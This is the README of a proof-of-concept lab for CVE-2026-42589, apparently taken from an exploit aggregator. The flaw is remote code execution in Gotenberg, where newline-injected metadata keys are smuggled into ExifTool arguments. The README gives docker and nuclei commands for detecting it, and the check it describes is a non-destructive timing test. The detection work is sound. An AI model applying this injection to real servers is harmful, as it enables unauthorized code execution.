## https://sploitus.com/exploit?id=EEAC1C04-DDF1-5C0D-BDA0-7EC31B0B8984
# POC_CVE-2026-42589
Local reproduction lab and nuclei template draft for `CVE-2026-42589` affecting Gotenberg.
## Summary
`CVE-2026-42589` is an unauthenticated remote code execution issue in Gotenberg caused by metadata key newline injection in:
```text
POST /forms/pdfengines/metadata/write
```
Affected Gotenberg forwards user-controlled metadata keys to ExifTool without rejecting control characters. A metadata key containing JSON-escaped newlines may be split into additional ExifTool arguments.
This lab was used to validate:
- vulnerable behavior on `gotenberg/gotenberg:8.29.1`
- patched behavior on `gotenberg/gotenberg:8.31.0`
The nuclei template uses only a non-destructive `sleep 6` timing check.
## References
- GitHub Advisory: https://github.com/gotenberg/gotenberg/security/advisories/GHSA-rqgh-gxv4-6657
- Fixed release: https://github.com/gotenberg/gotenberg/releases/tag/v8.31.0
- ExifTool docs: https://exiftool.org/exiftool_pod.html
## Files
- `docker-compose.yml`
- `docker-compose.latest.yml`
- `CVE-2026-42589.yaml`
- `README.md`
## Vulnerable Test
Start Gotenberg `8.29.1`:
```bash
docker compose down -v
docker compose up -d
docker compose logs --tail=100 gotenberg
```
Check the version:
```bash
curl -s http://127.0.0.1:3000/version
```
## Patched-Version Control
Start Gotenberg `8.31.0`:
```bash
docker compose -f docker-compose.latest.yml down -v
docker compose -f docker-compose.latest.yml up -d
docker compose -f docker-compose.latest.yml logs --tail=100 gotenberg
```
Check the version:
```bash
curl -s http://127.0.0.1:3000/version
```
## Nuclei
Validate the template:
```bash
nuclei -duc -validate -t CVE-2026-42589.yaml
```
Run against the vulnerable target:
```bash
nuclei -duc -u http://127.0.0.1:3000 -t CVE-2026-42589.yaml
```
Expected behavior:
- `8.29.1`: match after the delayed `500` response
- `8.31.0`: no match
Observed vulnerable result:
```text
[CVE-2026-42589] [http] [critical] http://127.0.0.1:3000/forms/pdfengines/metadata/write
[INF] Scan completed in 6.245907708s. 1 matches found.
```
Observed patched-version result:
```text
[INF] Scan completed in 109.346792ms. No results found.
```
## Notes
- This lab intentionally avoids file writes, reverse shells, and out-of-band callbacks.
- The template detects behavior, not only a version banner.
- No real-world targets were used.
- Use only on systems you own or are explicitly authorized to test.